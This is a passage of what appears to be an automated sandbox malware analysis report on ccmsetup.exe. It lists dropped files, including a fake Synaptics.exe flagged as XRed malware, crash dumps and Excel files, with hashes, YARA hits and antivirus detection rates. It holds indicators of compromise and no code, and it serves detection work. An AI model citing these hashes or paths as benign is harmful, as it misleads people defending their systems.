                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>2180</Pi
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4580
                                                                                        Entropy (8bit):4.442963570153906
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZJJg77aI9ZbSWpW8VYaYm8M4JFFFE+q8ZiNZad:uIjfxI7fbz7VmJWHNZad
                                                                                        MD5:E9DD252DD106997CBD506FE97563D89E
                                                                                        SHA1:9C6F894218B708BB46B3B393EF02E42F17DBDB4D
                                                                                        SHA-256:B3C777FBF3E8A63E617865D5B62CBA4400D5404110245C00D485FBB806867060
                                                                                        SHA-512:589124C813D16F399E7046A48E0A9C7929674E52C863995DB1E92D45B994B32A1C7EC8AB6C4EFA5A0D58EE6BC7FE363C8D0B99FC92535C2B9EF3D888A44D2B7A
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618534" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 21:50:54 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):3915098
                                                                                        Entropy (8bit):2.3399218835300455
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:wrzS/OUNt6ihz8xFKiCZFUvobSI+ml2qzMZOHZPm4:wOOUNYY8jfjvQ+mY
                                                                                        MD5:4E892967B4DF036D18D66978D3A1390A
                                                                                        SHA1:5CD8DCF29C4BEE0AEAFECDB79B883E8444D9F1AC
                                                                                        SHA-256:7D60FB497ED8FFF0ADE9D5EF48CC2327E237DB7FAF86A8F11A4F808E775DA9B0
                                                                                        SHA-512:D2C1AA20824FDA4D945C149F0D8D2F0BC9D4281AE183C89CFA587748B197351D0BEF665AB4897276026C6A10B2A181D1BF2B1026304B914977C60EFBDCC168F4
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6318
                                                                                        Entropy (8bit):3.7161279228518382
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:RSIU6o7wVetbqx+6d74TYiSeQE/v/c5aM4UU89bPzpsfa9rm:R6l7wVeJqx+6aYiSeUprU89bLpsfa5m
                                                                                        MD5:7F2353F5265ED12AE2BB9A4BEA135475
                                                                                        SHA1:AC7144528D2C12233D7FAD239F5A668C872E07CE
                                                                                        SHA-256:C1D489156061E58C52CF73CEC81B938C9A1BFD89AC0FC6951A54F4FF556A65B5
                                                                                        SHA-512:56DD3AB034D820CAC6748E7520AE1C7099BFF73464DD21974577AC43F3B1ABE4207F6C2B5E4F73F6C82B723E902285659CF4394A7317291BBF703FEC2EC6DC7F
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>2180</Pi
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4572
                                                                                        Entropy (8bit):4.444101908500219
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZ0Jg77aI9ZbSWpW8VY61Ym8M4JFQFS+q84GNZad:uIjfMI7fbz7VKJp0NZad
                                                                                        MD5:458C905859A7DB5E3F1DEBB80A87E8FF
                                                                                        SHA1:811D48D93337EC09592F82B0F2BC7BFFB677C55A
                                                                                        SHA-256:3AE59709DC6BB00DB78FBABA7E5E5FCDA5AAB69CA9B2A6BB5A59D588271F7AA0
                                                                                        SHA-512:A0967943BB1CD26A3B04E64F01CD5EC9DB5ACD0AF7780DD4F14110EDD637EE4E98A175C21624DFA07C0CD5C6DACC6781B110DE709751A39368E84DEBE311F403
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618533" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 21:51:07 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):4972638
                                                                                        Entropy (8bit):2.1605673752119117
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:gaG+XN1H4nQT1lSOF/CXNt9iQz8xFK0CZFUvobdoIpk5teqdOPjyozwT79bTxXrL:g6N1H4nQhhCXN/F8j9jvg7pk5W
                                                                                        MD5:5AAADBFAA6C5F580074A5F198E2823EF
                                                                                        SHA1:1AEAC8A82E04F6A1FD66CF77ADF1A7F011197BAD
                                                                                        SHA-256:FFB37CD69704FDD5F08A46C6EA8B26925CB7D034777D0288BA233E34A1CEB366
                                                                                        SHA-512:51DB1C67B9DA69FCEE94F688FB64AAAB5404B3B5E70E12A1CA37F7C775DDA1DE3021F4F673184A1D61EA348B739D12D6B00F1E082CFCD590227836FDD0BF758A
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6304
                                                                                        Entropy (8bit):3.713075079899843
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJqxJ6R2YiSqSypDZ89bypsf6Gm:R6lXJE6AYS8yCfS
                                                                                        MD5:44EC61504ABA9A46EA474A5649454751
                                                                                        SHA1:5490A084922CCF18A7DF7D6BAAC57AE65F9169A9
                                                                                        SHA-256:03F5D92E6C4C4007DEDDBDC12AA00C2355BC27DAC38B240D51B9C368345658B4
                                                                                        SHA-512:43B4393B1AF4BDA7522BAAAACFF1DAE3643467523A4EE485BF094CC7560C89FDEDB83EB39B363B04896B59879FB4F6D8DD7F8CC00546F82E0C3022AE81223EF9
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>2180</Pi
                                                                                        Process:C:\Users\user\Desktop\ccmsetup.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:modified
                                                                                        Size (bytes):771584
                                                                                        Entropy (8bit):6.645638500999874
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I+r:ansJ39LyjbJkQFMhmC+6GD9d
                                                                                        MD5:020E869138373254D25D50294CEB45AF
                                                                                        SHA1:FA802F233890198365C3273DEF15399F074610C5
                                                                                        SHA-256:3EFD789B8DDF86A424BB238DACC61F92D1665094CA892543359D6F0A33FC87A7
                                                                                        SHA-512:EE4715D5E56FD79D93447FF2802E0676B21CC8A9744F874B16B27B25BC45B796DB46CC2DA05B7FCC27CE53FCD0A3A136308B6AC02E77513F82F822D8BCF4612D
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXD7AF.tmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXD7AF.tmp, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                        Process:C:\Users\user\Desktop\ccmsetup.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):4873728
                                                                                        Entropy (8bit):5.56388575934556
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:gnsHyjtk2MYC5GDfmrE906DDnrvpjFGO+LFPPYK6Ii1+0UfWUWveO1b9Uqi1dP8B:gnsmtk2aWmrE906DDnjpREFgBIi9/
                                                                                        MD5:823444545911FD17E953437B7C712F2F
                                                                                        SHA1:6D1C0B1C3CAADE86C13196A0763538D0EE29322E
                                                                                        SHA-256:845B6F57D33B26DD409AE897707E4A5141991DF780983593965983D95C06C67D
                                                                                        SHA-512:51692B5D995081627364345FF73D2F16C573A1CDBCCF6130E0EE76417DECDF2B57BF09D8C242C709642E9C40D2482E6CCD6ECDA99C932B10FAC1D8AC44D3367B
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                        Process:C:\Users\user\Desktop\ccmsetup.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.271852502936651
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                        MD5:A06212119ED7CB88ABCD87AF16739ADF
                                                                                        SHA1:44FF256D9D0F1BB5F3C37F497EF2A21018CD3887
                                                                                        SHA-256:3AD1ABF4A585BAB5500FECA053AA1D67ACF83A566C170C4705ACA094811C903E
                                                                                        SHA-512:9BE718E62CFBF19D99A847E90D9BBF7901F341D2A5E2ED76AE9879F12F6862574640D4DB4A83712E2E73413FED24D9B1857914337F508C9BEA7DA14960502B0A
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="c3A8JAfQanX4XPeDWHYLsg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2508665537285655
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+03LSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+QL+pAZewRDK4mW
                                                                                        MD5:B9F80DC5703567377995FD02F3F70C5F
                                                                                        SHA1:B108751C66A1EC2714FBD4749FF05ACD3EEB1A85
                                                                                        SHA-256:7B55882DD0DD775FBFF334838D90473CD32D802F82FF66027AF4E812E42F5DB9
                                                                                        SHA-512:77A9F4ADAC8667189FF1478E6F6395317005E988148C6E939D3D3FC582E4DEF4289E2CFFD8015D4E44C777B1A5F5687CA3AC6D090762957738F808BB12D498A9
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yxY5SYo80Nf-C-slhUKmdg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.267338457240888
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0PCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4C+pAZewRDK4mW
                                                                                        MD5:5D2AD27ED369A58F80C472C0D677C37C
                                                                                        SHA1:836CF41EA19B58989DA0539AB3487B4B2B007160
                                                                                        SHA-256:F867AFF7A0FDDB11E0189456045BCE27DEC3362D5F6297CE8EF6B10931F0689C
                                                                                        SHA-512:4443F4CEE9D637C4846BBC271D6E68D7E5C8A3FDA87E5FEBF3C35EA666470F6916CE6B120E1A1B85F5FAF01F571C662FBD94A839A8E1BD4EAB2BA82E20E107C1
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TfrLKbnafYZU7biZJF9qXQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2600506177670106
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0asSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Fs+pAZewRDK4mW
                                                                                        MD5:8DB4F15730583C1ACE1317FC607FD811
                                                                                        SHA1:B14373067584FB8CE5676946D8AB70C3485020B8
                                                                                        SHA-256:3F8842370DA5D2CEA3D1A1ADC43B157444D1FB1176CFC6130AEC818B414749A9
                                                                                        SHA-512:BEECD575D83CFAACB65A3C70EB2C1AE8D1F4DCA10C76134B359CEBDD9DBE034E1945EBEA061843ECA1EF82DA71127014046908CD2120F830C2F15E05F4423687
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.259000875197374
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                        MD5:4790EA6A2A7BECAECF402E05361F4952
                                                                                        SHA1:BD34BD5DBE9A5D17C3562EDEF70B88B4A76BD0A7
                                                                                        SHA-256:57F25E69B4C2BFE0A8369B42370CF761A17AC0D9EE87729419995F3C043B4201
                                                                                        SHA-512:977E382E5678D5755C1E1DBDA6F4B24C8CA3B7DF7FFBDEF07D5082A303354BC99A16F8F5CBB3F4424163FCEF1874DD4312421D2D34721C7E780203E1BE674159
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.25028293661055
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+05ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
                                                                                        MD5:072C47C3B82158472ADDC7835AE1CA15
                                                                                        SHA1:221CFA6DD07A4362DD383F21D9B1E6A0D196A4F5
                                                                                        SHA-256:05A1DFDD37095DAE33D8020B4418742006C7617B9AFE2D74A669882290F75D6C
                                                                                        SHA-512:932A5009DEE46F4F5FDD5569E0FCFCB4BB846E178DA17DCE7D271B67FC3AD276DFC079C78911E7F4A7BF14C8D32BF5110B55C7AA7CE4A59491CB1052560DDCF1
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.26037955444317
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0SkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                        MD5:DF72DFC3EB346D1355211A06C5EE6AAB
                                                                                        SHA1:7B9FC63EEA9EE8AB5DD3A91686291EFBAF4465F3
                                                                                        SHA-256:C66D795F406B559A0F94C79865A2F74A03ACDFBE77224B1E17BAFEEF657E2C4F
                                                                                        SHA-512:54470A6CB39447CDE1DB9C47454600007EF115D4A101367775ED6D3139F10B53691C0D083DAE823B3EA83BB0BD0EAB1990A290D17EE601497CAF69919DB7FCA1
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:Microsoft Excel 2007+
                                                                                        Category:dropped
                                                                                        Size (bytes):18387
                                                                                        Entropy (8bit):7.523057953697544
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.264362717437775
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0gLSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1L+pAZewRDK4mW
                                                                                        MD5:F4754A64F04BD9A28FF774F96F70D5F4
                                                                                        SHA1:0A427A132A1439B024C386F635581F40BD697292
                                                                                        SHA-256:362667237C33EDC5CCE348A65F4C82870DB1F2ECD83748BC9F0696A7E154D5D6
                                                                                        SHA-512:B8B0D2EC798881BD987B7685091A61A17EE5DAA49C40A49D6962D17CC6B67F0FFE545F00CAD0CD72637FA71901D81789CBAA23486CA9BA614A0728A6A293462F
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):165
                                                                                        Entropy (8bit):1.5231029153786204
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                        MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                        SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                        SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                        SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):3.746897789531007
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                        MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                        SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                        SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                        SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                        Malicious:false
                                                                                        Process:C:\Users\user\Desktop\ccmsetup.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):4102192
                                                                                        Entropy (8bit):5.263364825092673
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:ymrE906DDnrvpjFGO+LFPPYK6Ii1+0UfWUWveO1b9Uqi1dP80qt/wTywEFEBE:ymrE906DDnjpREFgBIi95
                                                                                        MD5:169E238A8E29445C319F934362361D28
                                                                                        SHA1:824E61DE77DA1E91B4BBB09C92E6908E80D4143D
                                                                                        SHA-256:63FB838C9604C2AF8D8BC17A48D2D745F389AD984CC2AB5E0765D5B27C91A710
                                                                                        SHA-512:A7FCAA91C5DE184956605D403E1881B0F62076B01C0C6D03B5DBD42E9B8CA704AE59362B3D46F966C213E7B1E915DA95D681DB9CB6063923A50B76A55427F2BA
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:Microsoft Excel 2007+
                                                                                        Category:dropped
                                                                                        Size (bytes):18387
                                                                                        Entropy (8bit):7.523057953697544
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):165
                                                                                        Entropy (8bit):1.5231029153786204
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                        MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                        SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                        SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                        SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):771584
                                                                                        Entropy (8bit):6.645638500999874
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I+r:ansJ39LyjbJkQFMhmC+6GD9d
                                                                                        MD5:020E869138373254D25D50294CEB45AF
                                                                                        SHA1:FA802F233890198365C3273DEF15399F074610C5
                                                                                        SHA-256:3EFD789B8DDF86A424BB238DACC61F92D1665094CA892543359D6F0A33FC87A7
                                                                                        SHA-512:EE4715D5E56FD79D93447FF2802E0676B21CC8A9744F874B16B27B25BC45B796DB46CC2DA05B7FCC27CE53FCD0A3A136308B6AC02E77513F82F822D8BCF4612D
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
